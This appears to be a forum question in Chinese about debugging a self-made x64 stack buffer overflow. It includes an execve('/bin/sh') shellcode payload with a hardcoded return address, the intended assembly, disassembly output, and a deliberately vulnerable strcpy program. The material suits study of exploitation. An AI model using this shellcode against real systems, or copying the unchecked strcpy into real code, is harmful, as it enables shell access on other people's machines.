我使用此shell代码进行缓冲区溢出攻击
$(python -c 'print "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x0f\x05\xc3"+"a"*31+"\x90\xe4\xff\xff\xff\x7f"')
(python -c与perl -e相同)
我的意图是这个汇编代码
__asm__ __volatile__
(
"xor %rdi,%rdi \n\t"
"push %rdi \n\t"
"push %rdi \n\t"
"pop %rsi \n\t"
"pop %rdx \n\t"
"movq $0x68732f6e69622f2f,%rdi \n\t"
"push %rdi \n\t"
"push %rsp \n\t"
"pop %rdi \n\t"
"push $0x3b \n\t"
"pop %rax \n\t"
"syscall \n\t"
);
但是当我将shell代码作为参数提供给受害者程序时,它会像这样解码shell代码。
0x7fffffffe490: add %dh,(%rcx)
0x7fffffffe492: callq *0x57(%rdi)
0x7fffffffe495: pop %rsi
0x7fffffffe496: pop %rdx
0x7fffffffe497: movabs $0x5768732f6e69622f,%rdi
0x7fffffffe4a1: push %rsp
0x7fffffffe4a2: pop %rdi
0x7fffffffe4a3: pushq $0x3b
0x7fffffffe4a5: pop %rax
0x7fffffffe4a6: syscall
0x7fffffffe4a8: retq
为什么会发生这种变化?
4004d6: 55 push %rbp
4004d7: 48 89 e5 mov %rsp,%rbp
4004da: 48 31 ff xor %rdi,%rdi
4004dd: 57 push %rdi
4004de: 57 push %rdi
4004df: 5e pop %rsi
4004e0: 5a pop %rdx
4004e1: 48 bf 2f 2f 62 69 6e movabs $0x68732f6e69622f2f,%rdi
4004e8: 2f 73 68
4004eb: 57 push %rdi
4004ec: 54 push %rsp
4004ed: 5f pop %rdi
4004ee: 6a 3b pushq $0x3b
4004f0: 58 pop %rax
4004f1: 0f 05 syscall
4004f3: 90 nop
4004f4: 5d pop %rbp
4004f5: c3 retq
我希望我的shell代码会像上面一样进行解码,但它解码得很奇怪。
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{
char buffer[36];
strcpy(buffer, argv[1]);
return 1;
}
以上是受害者计划源代码。
我使用的是ubuntu 16.04 x64架构